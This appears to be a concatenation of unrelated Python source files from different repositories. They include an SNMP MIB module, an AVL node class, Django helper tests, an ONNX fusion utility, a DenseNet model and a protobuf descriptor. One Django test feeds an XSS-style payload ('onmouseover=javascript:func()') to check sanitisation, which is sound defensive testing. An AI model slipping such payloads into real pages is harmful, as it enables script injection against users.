ntcHWObjs = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1))
ntcHWEvents = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 2, 0))
ntcHWGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 1))
ntcHWCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 2))
ntcHWUnitTable = MibTable((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1), )
if mibBuilder.loadTexts: ntcHWUnitTable.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnitTable.setDescription("A table which contains an entry for each pluggable circuit board (in this MIB a 'unit' is the same as a pluggable circuit board.) Entries of this table are automatically created by the hardware management software.")
ntcHWUnitEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: ntcHWUnitEntry.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnitEntry.setDescription('A conceptual row in the ntcHWUnitTable. Rows are created automatically by the Hardware Management software.')
ntcHWAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("inService", 1), ("outOfService", 2), ("inTest", 3), ("missing", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWAdminState.setStatus('current')
if mibBuilder.loadTexts: ntcHWAdminState.setDescription('Represents the desired state of the unit. inService indicates that the unit is intended to be operating normally. outOfService indicates that the unit should be taken out of normal operating mode and no data traffic should appear in this unit. inTest indicates that the unit should be placed into a selftest mode. missing indicates that the unit is expected to be present but has been detected as not being physically present. The NMS is not allowed to set the value of ntcHWAdminstate to missing.')
ntcHWOperState = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("down", 1), ("up", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWOperState.setStatus('current')
if mibBuilder.loadTexts: ntcHWOperState.setDescription('Indicates the current state of the unit. down indicates that the unit is in a non-functional state. up indicates that the unit is functioning normally.')
ntcHWAvailabilityStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=NamedValues(("inCharge", 1), ("applicationStarting", 2), ("applicationShutdown", 3), ("platformStarting", 4), ("resetting", 5), ("separated", 6), ("unconfigured", 7), ("testing", 8), ("standby", 9), ("dormant", 10), ("unavailable", 11)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWAvailabilityStatus.setStatus('current')
if mibBuilder.loadTexts: ntcHWAvailabilityStatus.setDescription("Provides more specific information on the state of the unit in this conceptual row. The status column has eleven defined values: inCharge = the unit is fully operational and ready to perform its desired tasks; applicationStarting = the application software is starting up; applicationShutdown = the application software is shutting down; platformStarting = Basic platform software is starting up; resetting = the disk files are closed and hardware reset is forced; separated = Only basic OS software is running. The unit can start application software on request; unconfigured = The administrative state of the unit is 'missing', disk files are closed and only basic OS software is running. The unit refuses to start application software; testing = Selftests can be performed, only basic OS are running; standby = The unit is redundant and is fully operational but not in charge of operations. It is ready to move to 'inCharge' state when necessary; dormant = All connections are physically inactive to enable removal of the unit without electric disturbance in the backplane. Only watchdog software is running for a short duration of time; unavailable = The unit is not physically present or cannot be contacted.")
ntcHWRestart = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("reset", 1), ("hotRestart", 2), ("detach", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWRestart.setStatus('current')
if mibBuilder.loadTexts: ntcHWRestart.setDescription('Provides the ability to reset or perform a hot restart the unit represented by this conceptual row. reset = the Unit is shutdown in an orderly manner and restarted again via hardware reset; hotRestart = only the software in a unit is restarted, a hardware reset is not initiated; detach = all electrical connections of the unit are forced to an inactive state to enable removal of the unit without electrical disturbance in the backplane.')
ntcHWLedState = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("red", 1), ("yellow", 2), ("black", 3), ("green", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWLedState.setStatus('current')
if mibBuilder.loadTexts: ntcHWLedState.setDescription('Indicates the current LED color of the unit represented by this conceptual row.')
ntcHWSerialNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWSerialNumber.setStatus('current')
if mibBuilder.loadTexts: ntcHWSerialNumber.setDescription('The units serial number in displayable format.')
ntcHWProductionDate = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWProductionDate.setStatus('current')
if mibBuilder.loadTexts: ntcHWProductionDate.setDescription('The units production date in displayable format.')
ntcHWUnitEntryChanged = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 1, 1, 8), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWUnitEntryChanged.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnitEntryChanged.setDescription('Represents the value of sysUpTime at the instant that this conceptual row entry has changed.')
ntcHWSlotTable = MibTable((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 2), )
if mibBuilder.loadTexts: ntcHWSlotTable.setStatus('current')
if mibBuilder.loadTexts: ntcHWSlotTable.setDescription('Table whose entries represent the expected circuit board type. The entries are created automatically by the hardware management software.')
ntcHWSlotEntry = MibTableRow((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 2, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: ntcHWSlotEntry.setStatus('current')
if mibBuilder.loadTexts: ntcHWSlotEntry.setDescription('The logical row describing the expected circiut board type of a slot.')
ntcHWDesiredUnitType = MibTableColumn((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 2, 1, 2), AutonomousType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWDesiredUnitType.setStatus('current')
if mibBuilder.loadTexts: ntcHWDesiredUnitType.setDescription("The unit type which is expected to be inserted or present in the current slot. An indication of the vendor-specific hardware type of the HWM entity. Note that this is different from the definition of MIB-II's sysObjectID. An agent should set this object to a enterprise-specific registration identifier value indicating the specific equipment type in detail. If no vendor-specific registration identifier exists for this entity, or the value is unknown by this agent, then the value { 0 0 } is returned.")
ntcHWLastChangedTime = MibScalar((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 3), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ntcHWLastChangedTime.setStatus('current')
if mibBuilder.loadTexts: ntcHWLastChangedTime.setDescription('The value of sysUpTime at the time any of these events occur: * any instance in the following object changes value: - hwmUnitEntryChanged This object shall be set to value 0 in startup.')
ntcHWLoadInventoryContainer = MibScalar((1, 3, 6, 1, 4, 1, 94, 1, 16, 7, 1, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: ntcHWLoadInventoryContainer.setStatus('current')
if mibBuilder.loadTexts: ntcHWLoadInventoryContainer.setDescription('Writing any value to this object will cause the hardware management software to reread its configuration file from disk.')
ntcHWUnits = ObjectGroup((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 1, 1)).setObjects(("NOKIA-HWM-MIB", "ntcHWAdminState"), ("NOKIA-HWM-MIB", "ntcHWOperState"), ("NOKIA-HWM-MIB", "ntcHWAvailabilityStatus"), ("NOKIA-HWM-MIB", "ntcHWRestart"), ("NOKIA-HWM-MIB", "ntcHWLedState"), ("NOKIA-HWM-MIB", "ntcHWSerialNumber"), ("NOKIA-HWM-MIB", "ntcHWProductionDate"), ("NOKIA-HWM-MIB", "ntcHWUnitEntryChanged"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ntcHWUnits = ntcHWUnits.setStatus('current')
if mibBuilder.loadTexts: ntcHWUnits.setDescription('A collection of objects representing the status of a unit.')
ntcHWCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 94, 1, 16, 8, 1, 2, 1)).setObjects(("ENTITY-MIB", "entityPhysicalGroup"), ("NOKIA-HWM-MIB", "ntcHWUnits"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ntcHWCompliance = ntcHWCompliance.setStatus('current')
if mibBuilder.loadTexts: ntcHWCompliance.setDescription('The compliance statement Hardware Management.')
mibBuilder.exportSymbols("NOKIA-HWM-MIB", ntcHWCompliance=ntcHWCompliance, ntcHWLedState=ntcHWLedState, ntcHWDesiredUnitType=ntcHWDesiredUnitType, ntcHWLastChangedTime=ntcHWLastChangedTime, ntcHWSlotEntry=ntcHWSlotEntry, ntcHWUnits=ntcHWUnits, ntcHWUnitEntry=ntcHWUnitEntry, ntcHWUnitEntryChanged=ntcHWUnitEntryChanged, ntcHWUnitTable=ntcHWUnitTable, ntcHWProductionDate=ntcHWProductionDate, ntcHWLoadInventoryContainer=ntcHWLoadInventoryContainer, ntcHWGroups=ntcHWGroups, ntcHWCompliances=ntcHWCompliances, ntcHWModule=ntcHWModule, ntcHWOperState=ntcHWOperState, ntcHWRestart=ntcHWRestart, ntcHWEvents=ntcHWEvents, ntcHWAvailabilityStatus=ntcHWAvailabilityStatus, ntcHWAdminState=ntcHWAdminState, ntcHWSlotTable=ntcHWSlotTable, ntcHWSerialNumber=ntcHWSerialNumber, ntcHWObjs=ntcHWObjs, PYSNMP_MODULE_ID=ntcHWModule)
| 168 | 1,280 | 0.772321 | [
"Apache-2.0"
] | agustinhenze/mibs.snmplabs.com | pysnmp-with-texts/NOKIA-HWM-MIB.py | 14,112 | Python |
class NoNodeData(Exception):
pass
class AVLNode(object):
def __init__(self, key=None, value=None) -> None:
"""Initializes the AVL Node.
Args:
data (dict, optional): {Key:Value} pair. Defaults to None.
"""
super().__init__()
self.key = key
self.value = value
self.left = None
self.right = None
self.height = 1
def __str__(self) -> str:
"""Prints single AVL Node to stdout
Raises:
NoNodeData: If no data is present in the node
Returns:
str: output string
"""
if self.key:
out = "data: {0}\nleft: {1}\nright: {2}\n".format(
(self.key, self.value), self.left.__str__(), self.right.__str__())
return out
raise NoNodeData
def get_key(self) -> str:
"""returns the key of the node
Returns:
str: the key in (key, value) pair
"""
return self.key
def get_value(self) -> str:
"""returns the value of the key
Returns:
str: the value in (key, value) pair
"""
return self.value
| 23.56 | 82 | 0.516129 | [
"MIT"
] | gpk2000/avl-db | avltree/AVLNode.py | 1,178 | Python |
# -*- coding: utf-8 -*-
from benedict.core import clone as _clone
from benedict.core import traverse as _traverse
import unittest
class traverse_test_case(unittest.TestCase):
def test_traverse(self):
i = {
'a': {
'x': 2,
'y': 3,
'z': {
'ok': 5,
}
},
'b': {
'x': 7,
'y': 11,
'z': {
'ok': 13,
}
},
'c': {
'x': 17,
'y': 19,
'z': {
'ok': 23,
}
},
}
o = _clone(i)
with self.assertRaises(ValueError):
_traverse(o, True)
def f(parent, key, value):
if not isinstance(value, dict):
parent[key] = (value + 1)
_traverse(o, f)
r = {
'a': {
'x': 3,
'y': 4,
'z': {
'ok': 6,
}
},
'b': {
'x': 8,
'y': 12,
'z': {
'ok': 14,
}
},
'c': {
'x': 18,
'y': 20,
'z': {
'ok': 24,
}
},
}
self.assertEqual(o, r)
| 22 | 47 | 0.249311 | [
"MIT"
] | antran22/python-benedict | tests/core/test_traverse.py | 1,452 | Python |
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#--------------------------------------------------------------------------
from logging import getLogger
from .onnx_model import OnnxModel
from typing import Tuple
from onnx import helper, TensorProto
logger = getLogger(__name__)
class FusionUtils:
def __init__(self, model: OnnxModel):
self.model: OnnxModel = model
def cast_graph_input_to_int32(self, input_name: str) -> Tuple[bool, str]:
graph_input = self.model.find_graph_input(input_name)
if graph_input is not None and graph_input.type.tensor_type.elem_type != TensorProto.INT32:
cast_output, cast_node = self.cast_input_to_int32(input_name)
logger.debug(f"Casted graph input {input_name} to int32")
return True, cast_output
logger.debug(f"Did not cast graph input {input_name} to int32: found {graph_input is not None}")
return False, input_name
def cast_input_to_int32(self, input_name: str):
cast_output = input_name + '_int32'
# Avoid consequent Cast nodes.
inputs = [input_name]
output_name_to_node = self.model.output_name_to_node()
if input_name in output_name_to_node:
parent_node = output_name_to_node[input_name]
if parent_node and parent_node.op_type == 'Cast':
inputs = [parent_node.input[0]]
cast_node = helper.make_node('Cast', inputs=inputs, outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.INT32))])
self.model.add_node(cast_node)
return cast_output, cast_node
def remove_cast_int32(self, input_name: str):
input_name_to_nodes = self.model.input_name_to_nodes()
nodes = input_name_to_nodes[input_name]
for node in nodes:
if node.op_type == "Cast":
is_int32 = False
for att in node.attribute:
if att.name == 'to' and att.i == int(TensorProto.INT32):
is_int32 = True
break
if is_int32:
output_name = node.output[0]
self.model.remove_node(node)
self.model.replace_input_of_all_nodes(output_name, input_name)
| 41.741379 | 104 | 0.609252 | [
"Apache-2.0"
] | kiminh/fastformers | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | 2,421 | Python |
import pytest
import requests
from directory_constants import expertise, sectors
from django.shortcuts import Http404
from django.urls import reverse
from core import helpers
import core.tests.helpers
@pytest.mark.parametrize('status_code,exception', (
(400, requests.exceptions.HTTPError),
(404, Http404),
(500, requests.exceptions.HTTPError),
))
def test_handle_cms_response_error(status_code, exception):
response = core.tests.helpers.create_response(status_code=status_code)
with pytest.raises(exception):
helpers.handle_cms_response(response)
def test_handle_cms_response_ok():
response = core.tests.helpers.create_response(
status_code=200, json_payload={'field': 'value'}
)
assert helpers.handle_cms_response(response) == {'field': 'value'}
@pytest.mark.parametrize('path,expect_code', (
('/', None),
('?language=pt', 'pt'),
('/?language=ar', 'ar'),
('/industries?language=es', 'es'),
('/industries/?language=zh-hans', 'zh-hans'),
('/industries/aerospace?language=de', 'de'),
('/industries/automotive/?language=fr', 'fr'),
('?lang=fr', 'fr'),
('?language=de&lang=de', 'de'),
('?lang=pt&language=es', 'es')
))
def test_get_language_from_querystring(path, expect_code, rf):
url = reverse('index')
request = rf.get(url + path)
language_code = helpers.get_language_from_querystring(request)
assert language_code == expect_code
def test_company_parser_serialize_for_template(retrieve_profile_data):
company = helpers.CompanyParser(retrieve_profile_data)
assert company.serialize_for_template() == {
'address': '123 Fake Street, Fakeville, London, E14 6XK',
'address_line_1': '123 Fake Street',
'address_line_2': 'Fakeville',
'country': 'GB',
'date_of_creation': '02 March 2015',
'description': 'Ecommerce website',
'email_address': '[email protected]',
'email_full_name': 'Jeremy',
'employees': '501-1,000',
'expertise_countries': '',
'expertise_industries': '',
'expertise_languages': '',
'expertise_products_services': {},
'expertise_regions': '',
'facebook_url': 'http://www.facebook.com',
'has_expertise': False,
'keywords': 'word1, word2',
'linkedin_url': 'http://www.linkedin.com',
'locality': 'London',
'logo': 'nice.jpg',
'mobile_number': '07506043448',
'modified': '2016-11-23T11:21:10.977518Z',
'name': 'Great company',
'number': '01234567',
'po_box': 'abc',
'postal_code': 'E14 6XK',
'postal_full_name': 'Jeremy',
'sectors': 'Security',
'slug': 'great-company',
'summary': 'this is a short summary',
'supplier_case_studies': [],
'twitter_url': 'http://www.twitter.com',
'verified_with_code': True,
'website': 'http://example.com',
'company_type': 'COMPANIES_HOUSE',
'is_published_investment_support_directory': True,
'is_published_find_a_supplier': True,
'is_in_companies_house': True
}
def test_company_parser_serialize_for_template_empty():
company = helpers.CompanyParser({})
assert company.serialize_for_template() == {}
def test_get_results_from_search_response_xss(retrieve_profile_data):
response = core.tests.helpers.create_response(json_payload={
'hits': {
'total': 1,
'hits': [
{
'_source': retrieve_profile_data,
'highlight': {
'description': [
'<a onmouseover=javascript:func()>stuff</a>',
'to the max <em>wolf</em>.'
]
}
}
]
}
})
formatted = helpers.get_results_from_search_response(response)
assert formatted['results'][0]['highlight'] == (
'<a onmouseover=javascript:func()>stuff</a>...to the max '
'<em>wolf</em>.'
)
def test_get_filters_labels():
filters = {
'expertise_languages': ['aa'],
'q': 'foo',
'page': 5,
'expertise_regions': ['NORTH_EAST'],
'expertise_products_services_financial': [expertise.FINANCIAL[1]],
'industries': [sectors.AEROSPACE, sectors.ADVANCED_MANUFACTURING],
'expertise_products_services_human_resources': [
'Employment and talent research'
],
}
expected = [
'Afar',
'North East',
'Insurance',
'Aerospace',
'Advanced manufacturing',
'Employment and talent research',
]
assert helpers.get_filters_labels(filters) == expected
| 31.388158 | 78 | 0.607001 | [
"MIT"
] | uktrade/directory-ui-supplier | core/tests/test_helpers.py | 4,771 | Python |
from setuptools import setup
setup(
name='yt-dl',
version = "0.1.0",
author = "Fernando Luiz Cola",
author_email ="[email protected]",
license = "MIT",
install_requires=[
'Flask',
'youtube-dl',
],
)
| 21.571429 | 52 | 0.480132 | [
"Unlicense"
] | ferlzc/youtube-dl-flask | setup.py | 302 | Python |
import re
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
from collections import OrderedDict
__all__ = ['DenseNet', 'densenet121', 'densenet169', 'densenet201', 'densenet161']
model_urls = {
'densenet121': 'https://download.pytorch.org/models/densenet121-a639ec97.pth',
'densenet169': 'https://download.pytorch.org/models/densenet169-b2777c0a.pth',
'densenet201': 'https://download.pytorch.org/models/densenet201-c1103571.pth',
'densenet161': 'https://download.pytorch.org/models/densenet161-8d451a50.pth',
}
def densenet121(pretrained=False, **kwargs):
r"""Densenet-121 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=64, growth_rate=32, block_config=(6, 12, 24, 16),
**kwargs)
if pretrained:
# '.'s are no longer allowed in module names, but pervious _DenseLayer
# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet121'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
def densenet169(pretrained=False, **kwargs):
r"""Densenet-169 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=64, growth_rate=32, block_config=(6, 12, 32, 32),
**kwargs)
if pretrained:
# '.'s are no longer allowed in module names, but pervious _DenseLayer
# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet169'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
def densenet201(pretrained=False, **kwargs):
r"""Densenet-201 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=64, growth_rate=32, block_config=(6, 12, 48, 32),
**kwargs)
if pretrained:
# '.'s are no longer allowed in module names, but pervious _DenseLayer
# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet201'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
def densenet161(pretrained=False, **kwargs):
r"""Densenet-161 model from
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = DenseNet(num_init_features=96, growth_rate=48, block_config=(6, 12, 36, 24),
**kwargs)
if pretrained:
# '.'s are no longer allowed in module names, but pervious _DenseLayer
# has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.
# They are also in the checkpoints in model_urls. This pattern is used
# to find such keys.
pattern = re.compile(
r'^(.*denselayer\d+\.(?:norm|relu|conv))\.((?:[12])\.(?:weight|bias|running_mean|running_var))$')
state_dict = model_zoo.load_url(model_urls['densenet161'])
for key in list(state_dict.keys()):
res = pattern.match(key)
if res:
new_key = res.group(1) + res.group(2)
state_dict[new_key] = state_dict[key]
del state_dict[key]
model.load_state_dict(state_dict)
return model
class _DenseLayer(nn.Sequential):
def __init__(self, num_input_features, growth_rate, bn_size, drop_rate):
super(_DenseLayer, self).__init__()
self.add_module('norm1', nn.BatchNorm2d(num_input_features)),
self.add_module('relu1', nn.ReLU(inplace=True)),
self.add_module('conv1', nn.Conv2d(num_input_features, bn_size *
growth_rate, kernel_size=1, stride=1, bias=False)),
self.add_module('norm2', nn.BatchNorm2d(bn_size * growth_rate)),
self.add_module('relu2', nn.ReLU(inplace=True)),
self.add_module('conv2', nn.Conv2d(bn_size * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)),
self.drop_rate = drop_rate
def forward(self, x):
new_features = super(_DenseLayer, self).forward(x)
if self.drop_rate > 0:
new_features = F.dropout(new_features, p=self.drop_rate, training=self.training)
return torch.cat([x, new_features], 1)
class _DenseBlock(nn.Sequential):
def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate):
super(_DenseBlock, self).__init__()
for i in range(num_layers):
layer = _DenseLayer(num_input_features + i * growth_rate, growth_rate, bn_size, drop_rate)
self.add_module('denselayer%d' % (i + 1), layer)
class _Transition(nn.Sequential):
def __init__(self, num_input_features, num_output_features):
super(_Transition, self).__init__()
self.add_module('norm', nn.BatchNorm2d(num_input_features))
self.add_module('relu', nn.ReLU(inplace=True))
self.add_module('conv', nn.Conv2d(num_input_features, num_output_features,
kernel_size=1, stride=1, bias=False))
self.add_module('pool', nn.AvgPool2d(kernel_size=2, stride=2))
class DenseNet(nn.Module):
r"""Densenet-BC model class, based on
`"Densely Connected Convolutional Networks" <https://arxiv.org/pdf/1608.06993.pdf>`_
Args:
growth_rate (int) - how many filters to add each layer (`k` in paper)
block_config (list of 4 ints) - how many layers in each pooling block
num_init_features (int) - the number of filters to learn in the first convolution layer
bn_size (int) - multiplicative factor for number of bottle neck layers
(i.e. bn_size * k features in the bottleneck layer)
drop_rate (float) - dropout rate after each dense layer
num_classes (int) - number of classification classes
"""
def __init__(self, growth_rate=32, block_config=(6, 12, 24, 16),
num_init_features=64, bn_size=4, drop_rate=0, num_classes=1000):
super(DenseNet, self).__init__()
# First convolution
self.features = nn.Sequential(OrderedDict([
('conv0', nn.Conv2d(3, num_init_features, kernel_size=7, stride=2, padding=3, bias=False)),
('norm0', nn.BatchNorm2d(num_init_features)),
('relu0', nn.ReLU(inplace=True)),
('pool0', nn.MaxPool2d(kernel_size=3, stride=2, padding=1)),
]))
# Each denseblock
num_features = num_init_features
for i, num_layers in enumerate(block_config):
block = _DenseBlock(num_layers=num_layers, num_input_features=num_features,
bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)
self.features.add_module('denseblock%d' % (i + 1), block)
num_features = num_features + num_layers * growth_rate
if i != len(block_config) - 1:
trans = _Transition(num_input_features=num_features, num_output_features=num_features // 2)
self.features.add_module('transition%d' % (i + 1), trans)
num_features = num_features // 2
# Final batch norm
self.features.add_module('norm5', nn.BatchNorm2d(num_features))
# Linear layer
self.classifier = nn.Linear(num_features, num_classes)
# Official init from torch repo.
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.constant_(m.bias, 0)
def forward(self, x):
features = self.features(x)
out = F.relu(features, inplace=True)
out = F.avg_pool2d(out, kernel_size=7, stride=1).view(features.size(0), -1)
out = self.classifier(out)
return out
| 44.216814 | 109 | 0.625638 | [
"BSD-3-Clause"
] | AaronLeong/cvlib | cvlib/models/densenet.py | 9,993 | Python |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: storyboard_node.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from container_sdk.model.next_builder import storyboard_brick_pb2 as container__sdk_dot_model_dot_next__builder_dot_storyboard__brick__pb2
from container_sdk.model.next_builder import storyboard_route_pb2 as container__sdk_dot_model_dot_next__builder_dot_storyboard__route__pb2
from container_sdk.model.next_builder import micro_app_project_pb2 as container__sdk_dot_model_dot_next__builder_dot_micro__app__project__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='storyboard_node.proto',
package='next_builder',
syntax='proto3',
serialized_options=_b('ZFgo.easyops.local/contracts/protorepo-models/easyops/model/next_builder'),
serialized_pb=_b('\n\x15storyboard_node.proto\x12\x0cnext_builder\x1a\x37\x63ontainer_sdk/model/next_builder/storyboard_brick.proto\x1a\x37\x63ontainer_sdk/model/next_builder/storyboard_route.proto\x1a\x38\x63ontainer_sdk/model/next_builder/micro_app_project.proto\"\xe8\x02\n\x0eStoryboardNode\x12\x12\n\ninstanceId\x18\x01 \x01(\t\x12\r\n\x05\x61lias\x18\x02 \x01(\t\x12\r\n\x05\x61ppId\x18\x03 \x01(\t\x12\n\n\x02id\x18\x04 \x01(\t\x12\x12\n\nmountPoint\x18\x05 \x01(\t\x12\x0c\n\x04sort\x18\x06 \x01(\x05\x12\x0c\n\x04type\x18\x07 \x01(\t\x12,\n\x05\x62rick\x18\x08 \x01(\x0b\x32\x1d.next_builder.StoryboardBrick\x12,\n\x05route\x18\t \x01(\x0b\x32\x1d.next_builder.StoryboardRoute\x12.\n\x07project\x18\n \x01(\x0b\x32\x1d.next_builder.MicroAppProject\x12,\n\x06parent\x18\x0b \x01(\x0b\x32\x1c.next_builder.StoryboardNode\x12.\n\x08\x63hildren\x18\x0c \x03(\x0b\x32\x1c.next_builder.StoryboardNodeBHZFgo.easyops.local/contracts/protorepo-models/easyops/model/next_builderb\x06proto3')
,
dependencies=[container__sdk_dot_model_dot_next__builder_dot_storyboard__brick__pb2.DESCRIPTOR,container__sdk_dot_model_dot_next__builder_dot_storyboard__route__pb2.DESCRIPTOR,container__sdk_dot_model_dot_next__builder_dot_micro__app__project__pb2.DESCRIPTOR,])
_STORYBOARDNODE = _descriptor.Descriptor(
name='StoryboardNode',
full_name='next_builder.StoryboardNode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='instanceId', full_name='next_builder.StoryboardNode.instanceId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='alias', full_name='next_builder.StoryboardNode.alias', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appId', full_name='next_builder.StoryboardNode.appId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id', full_name='next_builder.StoryboardNode.id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mountPoint', full_name='next_builder.StoryboardNode.mountPoint', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
